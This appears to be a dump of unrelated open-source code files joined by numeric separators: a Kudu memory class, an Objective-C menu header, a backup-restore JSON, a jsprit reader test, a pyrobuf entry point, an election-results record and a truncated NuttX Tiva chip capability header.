explicit RowBlockMemory(int arena_size = 32 * 1024) : arena(arena_size) {}
~RowBlockMemory() { Reset(); }
void Reset() {
arena.Reset();
for (auto& f : to_release_) {
f();
}
to_release_.clear();
}
// Retain a reference, typically to a BlockHandle. This is templatized to avoid
// a circular dependency between kudu/common/ and kudu/cfile/
template<class T>
void RetainReference(const scoped_refptr<T>& item) {
// TODO(todd) if this ever ends up being a hot code path, we could
// probably optimize by having a small hashset of pointers. If an
// element is already in the set, we don't need to add a second copy.
T* raw = item.get();
raw->AddRef();
to_release_.emplace_back([=]() { raw->Release(); });
}
private:
std::vector<std::function<void()>> to_release_;
};
} // namespace kudu
| 755 |
1,025 | #import <Foundation/Foundation.h>
@interface CDEMenuItem : NSObject
#pragma mark Creating
- (id)initWithTitle:(NSString *)initTitle target:(id)initTarget action:(SEL)initAction representedObject:(id)initRepresentedObject badgeValue:(NSString *)initBadgeValue showsBadge:(BOOL)initShowsBadge;
#pragma mark Properties
@property (nonatomic, readonly, copy) NSString *title;
@property (nonatomic, readonly, assign) SEL action;
@property (nonatomic, readonly, assign) id target;
@property (nonatomic, readonly, retain) id representedObject;
@property (nonatomic, readonly, copy) NSString *badgeValue;
@property (nonatomic, readonly, assign) BOOL showsBadge;
@end | 203 |
713 | {
"location": "/path/accessible/to/the/server/backup-to-restore.zip",
"resources": {
"counters": ["*"]
}
}
| 50 |
634 | /*
* Copyright 2013-2016 consulo.io
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.intellij.diff.comparison;
/**
* @author VISTALL
* @since 18-Aug-16
*/
class MergeResolveUtil {
public static CharSequence tryResolveConflict(CharSequence leftText, CharSequence baseText, CharSequence rightText) {
// nothing, we don't have kotlin, and don't want it
// TODO [VISTALL] convert it from kotlin
return null;
}
}
| 277 |
571 | /***************************************************************************
Copyright 2015 Ufora Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
****************************************************************************/
#pragma once
#include "../../core/math/Hash.hpp"
namespace {
template<class R, class ... Args>
class TestCaseCall;
template<class R, class A1>
class TestCaseCall<R, A1> {
public:
static R call(A1 a)
{
R tr((hash_type((int)a) + hash_type(11))[0]);
return tr;
}
};
template<class R, class A1, typename ... Args>
class TestCaseCall<R, A1, Args... > {
public:
static R call(A1 a, Args ... args)
{
return R((hash_type((int)a) + hash_type((int)TestCaseCall<R, Args ...>::call(args ...)))[0]);
}
};
}
| 391 |
1,264 | <filename>jsprit-instances/src/test/java/com/graphhopper/jsprit/instance/reader/ChristophidesReaderTest.java
/*
* Licensed to GraphHopper GmbH under one or more contributor
* license agreements. See the NOTICE file distributed with this work for
* additional information regarding copyright ownership.
*
* GraphHopper GmbH licenses this file to you under the Apache License,
* Version 2.0 (the "License"); you may not use this file except in
* compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.graphhopper.jsprit.instance.reader;
import com.graphhopper.jsprit.core.problem.VehicleRoutingProblem;
import com.graphhopper.jsprit.core.problem.VehicleRoutingProblem.FleetSize;
import com.graphhopper.jsprit.core.problem.job.Service;
import com.graphhopper.jsprit.core.problem.vehicle.Vehicle;
import org.junit.Test;
import java.net.URL;
import static org.junit.Assert.assertEquals;
public class ChristophidesReaderTest {
@Test
public void whenReadingInstance_nuOfCustomersIsCorrect() {
VehicleRoutingProblem.Builder builder = VehicleRoutingProblem.Builder.newInstance();
new ChristofidesReader(builder).read(getPath("vrpnc1.txt"));
VehicleRoutingProblem vrp = builder.build();
assertEquals(50, vrp.getJobs().values().size());
}
private String getPath(String string) {
URL resource = this.getClass().getClassLoader().getResource(string);
if (resource == null) throw new IllegalStateException("resource " + string + " does not exist");
return resource.getPath();
}
@Test
public void whenReadingInstance_fleetSizeIsInfinite() {
VehicleRoutingProblem.Builder builder = VehicleRoutingProblem.Builder.newInstance();
new ChristofidesReader(builder).read(getPath("vrpnc1.txt"));
VehicleRoutingProblem vrp = builder.build();
assertEquals(FleetSize.INFINITE, vrp.getFleetSize());
}
@Test
public void whenReadingInstance_vehicleCapacitiesAreCorrect() {
VehicleRoutingProblem.Builder builder = VehicleRoutingProblem.Builder.newInstance();
new ChristofidesReader(builder).read(getPath("vrpnc1.txt"));
VehicleRoutingProblem vrp = builder.build();
for (Vehicle v : vrp.getVehicles()) {
assertEquals(160, v.getType().getCapacityDimensions().get(0));
}
}
@Test
public void whenReadingInstance_vehicleLocationsAreCorrect_and_correspondToDepotLocation() {
VehicleRoutingProblem.Builder builder = VehicleRoutingProblem.Builder.newInstance();
new ChristofidesReader(builder).read(getPath("vrpnc1.txt"));
VehicleRoutingProblem vrp = builder.build();
for (Vehicle v : vrp.getVehicles()) {
assertEquals(30.0, v.getStartLocation().getCoordinate().getX(), 0.01);
assertEquals(40.0, v.getStartLocation().getCoordinate().getY(), 0.01);
}
}
@Test
public void whenReadingInstance_vehicleDurationsAreCorrect() {
VehicleRoutingProblem.Builder builder = VehicleRoutingProblem.Builder.newInstance();
new ChristofidesReader(builder).read(getPath("vrpnc13.txt"));
VehicleRoutingProblem vrp = builder.build();
for (Vehicle v : vrp.getVehicles()) {
assertEquals(0.0, v.getEarliestDeparture(), 0.01);
assertEquals(720.0, v.getLatestArrival() - v.getEarliestDeparture(), 0.01);
}
}
@Test
public void whenReadingInstance_demandOfCustomerOneIsCorrect() {
VehicleRoutingProblem.Builder builder = VehicleRoutingProblem.Builder.newInstance();
new ChristofidesReader(builder).read(getPath("vrpnc1.txt"));
VehicleRoutingProblem vrp = builder.build();
assertEquals(7, vrp.getJobs().get("1").getSize().get(0));
}
@Test
public void whenReadingInstance_serviceDurationOfCustomerTwoIsCorrect() {
VehicleRoutingProblem.Builder builder = VehicleRoutingProblem.Builder.newInstance();
new ChristofidesReader(builder).read(getPath("vrpnc13.txt"));
VehicleRoutingProblem vrp = builder.build();
assertEquals(50.0, ((Service) vrp.getJobs().get("2")).getServiceDuration(), 0.1);
}
}
| 1,617 |
578 | <reponame>alekseyl1992/pyrobuf<filename>pyrobuf/__main__.py<gh_stars>100-1000
from pyrobuf.compile import Compiler
def main():
compiler = Compiler.parse_cli_args()
compiler.compile()
if __name__ == "__main__":
main()
| 93 |
348 | {"nom":"Appeville","circ":"3ème circonscription","dpt":"Manche","inscrits":157,"abs":83,"votants":74,"blancs":8,"nuls":1,"exp":65,"res":[{"nuance":"REM","nom":"<NAME>","voix":33},{"nuance":"LR","nom":"<NAME>","voix":32}]} | 88 |
1,006 | /****************************************************************************
* arch/arm/include/tiva/chip.h
*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership. The
* ASF licenses this file to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance with the
* License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*
****************************************************************************/
#ifndef __ARCH_ARM_INCLUDE_TIVA_CHIP_H
#define __ARCH_ARM_INCLUDE_TIVA_CHIP_H
/****************************************************************************
* Included Files
****************************************************************************/
#include <nuttx/config.h>
/****************************************************************************
* Pre-processor Prototypes
****************************************************************************/
/* Get customizations for each supported chip */
#if defined(CONFIG_ARCH_CHIP_LM3S6918)
# define LM3S 1 /* LM3S family */
# undef LM4F /* Not LM4F family */
# undef TM4C /* Not TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 4 /* Four 16/32-bit timers */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 1 /* One watchdog timer */
# define TIVA_NETHCONTROLLERS 1 /* One Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# undef TIVA_ETHTS /* No timestamp register */
# define TIVA_NSSI 2 /* Two SSI modules */
# define TIVA_NUARTS 2 /* Two UART modules */
# define TIVA_NI2C 2 /* Two I2C modules */
# define TIVA_NADC 1 /* One ADC module */
# define TIVA_NPWM 0 /* No PWM generator modules */
# define TIVA_NQEI 0 /* No quadrature encoders */
# define TIVA_NPORTS 8 /* 8 Ports (GPIOA-H) 5-38 GPIOs */
# define TIVA_NCANCONTROLLER 0 /* No CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_LM3S6432)
# define LM3S 1 /* LM3S family */
# undef LM4F /* Not LM4F family */
# undef TM4C /* Not TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 3 /* Three 16/32-bit timers */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 1 /* One watchdog timer */
# define TIVA_NETHCONTROLLERS 1 /* One Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# undef TIVA_ETHTS /* No timestamp register */
# define TIVA_NSSI 1 /* One SSI module */
# define TIVA_NUARTS 2 /* Two UART modules */
# define TIVA_NI2C 1 /* Two I2C modules */
# define TIVA_NADC 1 /* One ADC module */
# define TIVA_NPWM 1 /* One PWM generator module */
# define TIVA_NQEI 0 /* No quadrature encoders */
# define TIVA_NPORTS 7 /* 7 Ports (GPIOA-G), 0-42 GPIOs */
# define TIVA_NCANCONTROLLER 0 /* No CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_LM3S6965)
# define LM3S 1 /* LM3S family */
# undef LM4F /* Not LM4F family */
# undef TM4C /* Not TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 4 /* Four 16/32-bit timers */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 1 /* One watchdog timer */
# define TIVA_NETHCONTROLLERS 1 /* One Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# undef TIVA_ETHTS /* No timestamp register */
# define TIVA_NSSI 1 /* One SSI module */
# define TIVA_NUARTS 3 /* Three UART modules */
# define TIVA_NI2C 2 /* Two I2C modules */
# define TIVA_NADC 1 /* One ADC module */
# define TIVA_NPWM 3 /* Three PWM generator modules */
# define TIVA_NQEI 2 /* Two quadrature encoders */
# define TIVA_NPORTS 7 /* 7 Ports (GPIOA-G), 0-42 GPIOs */
# define TIVA_NCANCONTROLLER 0 /* No CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_LM3S9B96) || \
defined(CONFIG_ARCH_CHIP_LM3S9B92)
# define LM3S 1 /* LM3S family */
# undef LM4F /* Not LM4F family */
# undef TM4C /* Not TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 4 /* Four 16/32-bit timers */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 1 /* One watchdog timer */
# define TIVA_NETHCONTROLLERS 1 /* One Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# undef TIVA_ETHTS /* No timestamp register */
# define TIVA_NSSI 2 /* Two SSI modules */
# define TIVA_NUARTS 3 /* Three UART modules */
# define TIVA_NI2C 2 /* Two I2C modules */
# define TIVA_NADC 2 /* Two ADC module */
# define TIVA_CAN 2 /* Two CAN module */
# define TIVA_NPWM 4 /* Four PWM generator modules */
# define TIVA_NQEI 2 /* Two quadrature encoders */
# define TIVA_NPORTS 9 /* 9 Ports (GPIOA-H,J) 0-65 GPIOs */
# define TIVA_NCANCONTROLLER 0 /* No CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_LM3S8962)
# define LM3S 1 /* LM3S family */
# undef LM4F /* Not LM4F family */
# undef TM4C /* Not TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 6 /* Four 16/32-bit timers */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 1 /* One watchdog timer */
# define TIVA_NETHCONTROLLERS 1 /* One Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 1 /* One SSI module */
# define TIVA_NUARTS 3 /* Two UART modules */
# define TIVA_NI2C 2 /* One I2C module */
# define TIVA_NADC 1 /* One ADC module */
# define TIVA_NPWM 3 /* Three PWM generator modules */
# define TIVA_NQEI 2 /* Two quadrature encoders */
# define TIVA_NPORTS 7 /* 7 Ports (GPIOA-G), 5-42 GPIOs */
# define TIVA_NCANCONTROLLER 1 /* One CAN controller */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_LM4F120)
# undef LM3S /* Not LM3S family */
# define LM4F 1 /* LM4F family */
# undef TM4C /* Not TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 6 /* Six 16/32-bit timers */
# define TIVA_NWIDETIMERS 6 /* Six 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timer timers */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 4 /* Four SSI module */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 4 /* Four I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 0 /* No PWM generator modules */
# define TIVA_NQEI 0 /* No quadrature encoders */
# define TIVA_NPORTS 6 /* 6 Ports (GPIOA-F), 0-43 GPIOs */
# define TIVA_NCANCONTROLLER 1 /* One CAN controller */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C123GH6ZRB)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 6 /* Six 16/32-bit timers */
# define TIVA_NWIDETIMERS 6 /* Six 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 4 /* Four SSI module */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 6 /* Six I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 2 /* Two PWM generator modules */
# define TIVA_NQEI 1 /* One quadrature encoder */
# define TIVA_NPORTS 15 /* Fifteen Ports (GPIOA-H, J-N, P-Q) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 1 /* One USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C123GH6PM)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 6 /* Six 16/32-bit timers */
# define TIVA_NWIDETIMERS 6 /* Six 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 4 /* Four SSI module */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 4 /* Four I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 2 /* Two PWM generator modules */
# define TIVA_NQEI 2 /* Two quadrature encoders */
# define TIVA_NPORTS 6 /* Six Ports (GPIOA-F) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 1 /* One USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C123GH6PZ)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 6 /* Six 16/32-bit timers */
# define TIVA_NWIDETIMERS 6 /* Six 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 4 /* Four SSI module */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 6 /* Six I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 2 /* Two PWM generator modules */
# define TIVA_NQEI 2 /* Two quadrature encoders */
# define TIVA_NPORTS 10 /* Ten Ports (GPIOA-K) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 1 /* One USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C123GH6PGE)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 6 /* Six 16/32-bit timers */
# define TIVA_NWIDETIMERS 6 /* Six 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 4 /* Four SSI module */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 6 /* Six I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 2 /* Two PWM generator modules */
# define TIVA_NQEI 2 /* Two quadrature encoders */
# define TIVA_NPORTS 14 /* Fourteen Ports (GPIOA-P) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 1 /* One USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C123AH6PM)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 6 /* Six 16/32-bit timers */
# define TIVA_NWIDETIMERS 6 /* Six 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 4 /* Four SSI module */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 6 /* Six I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 2 /* Two PWM generator modules */
# define TIVA_NQEI 2 /* Two quadrature encoders */
# define TIVA_NPORTS 7 /* Seven Ports (GPIOA-G) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C1294NCPDT)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 8 /* Eight Dual 16/32-bit timers A/B */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 1 /* One 10/100Mbit Ethernet controller */
# define TIVA_NLCD 1 /* One LCD controller */
# define TIVA_NSSI 4 /* Four SSI modules */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 10 /* Ten I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 4 /* Four PWM generator modules */
# define TIVA_NQEI 1 /* One quadrature encoder */
# define TIVA_NPORTS 15 /* Fifteen Ports (GPIOA-H, J-N, P-Q) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 1 /* One USB 2.0 OTG HS */
# define TIVA_NCRC 1 /* One CRC module */
# define TIVA_NAES 0 /* No AES module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C129ENCPDT)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 8 /* Eight Dual 16/32-bit timers A/B */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 1 /* One 10/100Mbit Ethernet controller */
# define TIVA_NLCD 1 /* One LCD controller */
# define TIVA_NSSI 4 /* Four SSI modules */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 10 /* Ten I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 4 /* Four PWM generator modules */
# define TIVA_NQEI 1 /* One quadrature encoder */
# define TIVA_NPORTS 15 /* Fifteen Ports (GPIOA-H, J-N, P-Q) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 1 /* One USB 2.0 OTG HS */
# define TIVA_NCRC 1 /* One CRC module */
# define TIVA_NAES 1 /* One AES module */
# define TIVA_NDES 1 /* One DES module */
# define TIVA_NHASH 1 /* One SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_TM4C129XNCZAD) || defined(CONFIG_ARCH_CHIP_TM4C129ENCZAD)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# define TM4C 1 /* TM4C family */
# undef SIMPLELINK /* Not SimpleLink family */
# define TIVA_NTIMERS 8 /* Eight Dual 16/32-bit timers A/B */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 2 /* Two watchdog timers */
# define TIVA_NETHCONTROLLERS 1 /* One 10/100Mbit Ethernet controller */
# define TIVA_NLCD 1 /* One LCD controller */
# define TIVA_NSSI 4 /* Four SSI modules */
# define TIVA_NUARTS 8 /* Eight UART modules */
# define TIVA_NI2C 10 /* Ten I2C modules */
# define TIVA_NADC 2 /* Two ADC modules */
# define TIVA_NPWM 4 /* Four PWM generator modules */
# define TIVA_NQEI 1 /* One quadrature encoder module */
# define TIVA_NPORTS 18 /* Eighteen Ports (GPIOA-H, J-N, P-T) */
# define TIVA_NCANCONTROLLER 2 /* Two CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 1 /* One USB 2.0 OTG HS */
# define TIVA_NCRC 1 /* One CRC module */
# define TIVA_NAES 1 /* One AES module */
# define TIVA_NDES 1 /* One DES module */
# define TIVA_NHASH 1 /* One SHA1/MD5 hash module */
#elif defined(CONFIG_ARCH_CHIP_CC13X0)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# undef TM4C /* Not TM4C family */
# define SIMPLELINK 1 /* SimpleLink family */
# define TIVA_NTIMERS 4 /* Eight 16- or four 32-bit GPTM timers */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 1 /* One watchdog timer */
/* One RF timer */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 2 /* Two SSI modules */
# define TIVA_NUARTS 1 /* One UART module */
# define TIVA_NI2C 1 /* One I2C module */
/* One I2S module */
# define TIVA_NADC 1 /* One 12-bit, 8 channel ADC module */
/* One continuous time comparator */
/* Ultra low power clocked comparator */
/* Programmable current source */
# define TIVA_NPWM 0 /* No PWM generator modules */
# define TIVA_NQEI 0 /* No quadrature encoder modules */
# define TIVA_NPORTS 1 /* One Port */
# define TIVA_NCANCONTROLLER 0 /* No CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 1 /* One AES-128 module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 0 /* No SHA1/MD5 hash module */
/* One TRNG module */
/* Capacitive sensing, up to 8 channels */
/* Integrated temperatore sensor */
#elif defined(CONFIG_ARCH_CHIP_CC13X2)
# undef LM3S /* Not LM3S family */
# undef LM4F /* Not LM4F family */
# undef TM4C /* Not TM4C family */
# define SIMPLELINK 1 /* SimpleLink family */
# define TIVA_NTIMERS 4 /* Eight 16- or four 32-bit GPTM timers */
# define TIVA_NWIDETIMERS 0 /* No 32/64-bit timers */
# define TIVA_NWDT 1 /* One watchdog timer */
# define TIVA_NETHCONTROLLERS 0 /* No Ethernet controller */
# define TIVA_NLCD 0 /* No LCD controller */
# define TIVA_NSSI 2 /* Two SSI modules */
# define TIVA_NUARTS 2 /* Two UART module */
# define TIVA_NI2C 1 /* One I2C module */
/* One I2S module */
/* One RTC */
# define TIVA_NADC 1 /* One 12-bit, 8 channel ADC module */
/* Two comparators with reference DAC */
# define TIVA_NPWM 0 /* No PWM generator modules */
# define TIVA_NQEI 0 /* No quadrature encoder modules */
# define TIVA_NPORTS 1 /* One Port */
# define TIVA_NCANCONTROLLER 0 /* No CAN controllers */
# define TIVA_NUSBOTGFS 0 /* No USB 2.0 OTG FS */
# define TIVA_NUSBOTGHS 0 /* No USB 2.0 OTG HS */
# define TIVA_NCRC 0 /* No CRC module */
# define TIVA_NAES 1 /* One AES-256 module */
# define TIVA_NDES 0 /* No DES module */
# define TIVA_NHASH 1 /* SHA2 Accelerator (up to SHA-512) */
/* ECC and RSA Public Key Hardware Accelerator */
/* One TRNG module */
/* Capacitive sensing, up to 8 channels */
/* Integrated temperature and battery monitor */
#else
# error "Capabilities not specified for this TIVA/Stellaris chip"
